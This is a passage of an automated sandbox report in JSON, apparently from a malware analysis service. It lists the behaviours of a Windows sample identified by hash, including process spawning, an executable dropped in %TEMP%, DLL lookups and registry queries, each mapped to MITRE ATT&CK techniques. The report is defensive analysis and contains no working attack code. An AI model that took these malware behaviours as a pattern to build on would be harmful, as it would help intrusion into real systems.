"attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e7c6a@ADVAPI32.dll\"\n \"0e000f00703f7c6a@ADVAPI32.dll\"\n \"0e000f00cc3f7c6a@ADVAPI32.dll\"\n \"11001200b4477c6a@ADVAPI32.dll\"\n \"1100120048487c6a@ADVAPI32.dll\"\n \"120013008c487c6a@ADVAPI32.dll\"\n \"12001300e4487c6a@ADVAPI32.dll\"\n \"14001500386e7c6a@ADVAPI32.dll\"\n \"14001500506e7c6a@ADVAPI32.dll\"\n \"14001500686e7c6a@ADVAPI32.dll\"\n \"17001800806e7c6a@ADVAPI32.dll\"\n \"0d000e00986e7c6a@ADVAPI32.dll\"\n \"11001200a86e7c6a@ADVAPI32.dll\"\n \"11001200bc6e7c6a@ADVAPI32.dll\"\n \"0d000e0044667c6a@WININET.dll\"\n \"0d000e00b4667c6a@WININET.dll\"\n \"10001100ec667c6a@WININET.dll\"\n \"1000110090677c6a@WININET.dll\"\n \"10001100006f7c6a@WININET.dll\"\n \"10001100146f7c6a@WININET.dll\"\n \"14001500286f7c6a@WININET.dll\"\n \"14001500406f7c6a@WININET.dll\"\n \"12001300586f7c6a@WININET.dll\"\n \"120013006c6f7c6a@WININET.dll\"\n \"10001100d0677c6a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"CreateProcessW\" with parameter \":*C:\\559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe *\" - (UID: 00000000-00005848)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZTZXZG\" - (UID: 00000000-00006020)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has an writable section named \".data\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has an writable section named \".bss\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has an writable section named \".idata\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has an writable section named \".CRT\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has an writable section named \".tls\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70fc0000\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" loaded module \"KERNEL32\" at base 75e50000\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a730000\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75800000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75800000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 75690000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 76fc0000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 76370000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75960000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71e20000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75c00000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 77ba0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005848)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006020)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FC0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FC0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61 ...\" (UID: 00000000-00006020)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZTZXZG\" (UID: 00000000-00005864)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61 ...\" (UID: 00000000-00006020)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZTZXZG\" (UID: 00000000-00005864)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" was detected as \"MinGW\" and name: \"Compiler\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00005848]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" reads file \"c:\\559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\version.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00005848]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"559A8644FD0335023F86B8349AEB35ADBB2B96200710A39F34C3B4DA61B200F0\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: 